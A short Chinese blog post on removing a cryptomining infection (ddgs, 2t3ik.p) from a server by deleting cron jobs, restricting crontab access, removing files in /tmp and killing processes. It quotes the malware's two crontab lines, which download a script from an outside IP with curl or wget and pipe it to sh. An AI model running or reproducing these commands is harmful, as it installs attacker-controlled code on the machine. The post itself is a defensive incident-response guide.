服务端发现2t3ik.p进程占CPU过高。2t3ik ddgs.3011

    服务端出现挖矿进程2t3ik.p,CPU占用过高。
解决方法:

1、查看crontab任务清单

crontab -e
 可以看到下边两个任务

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh
 将任务删除即可,并设置任务权限。
/etc/cron.allow:将可以使用 crontab 的帐号写入其中,若不在这个文件内的使用者则不可使用 crontab;
/etc/cron.deny:将不可以使用 crontab 的帐号写入其中,若未记录到这个文件当中的使用者,就可以使用 crontab 。
//以优先顺序来说, /etc/cron.allow 比 /etc/cron.deny 要优先, 而判断上面,这两个文件只选择一个来限制而已,因此,建议你只要保留一个即可, 免得影响自己在配置上面的判断!一般来说,系统默认是保留 /etc/cron.deny ,你可以将不想让他运行 crontab 的那个使用者写入 /etc/cron.deny 当中,一个帐号一行!

2、删除挖矿相关文件 /tmp/ddgs.3011  /tmp/2t3ik.p  /tmp/2t3ik 

3、杀死 ddgs.3011  2t3ik.p进程。


完成以上步骤应该可以解决




    


阅读更多
个人分类: 服务端
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

关闭
关闭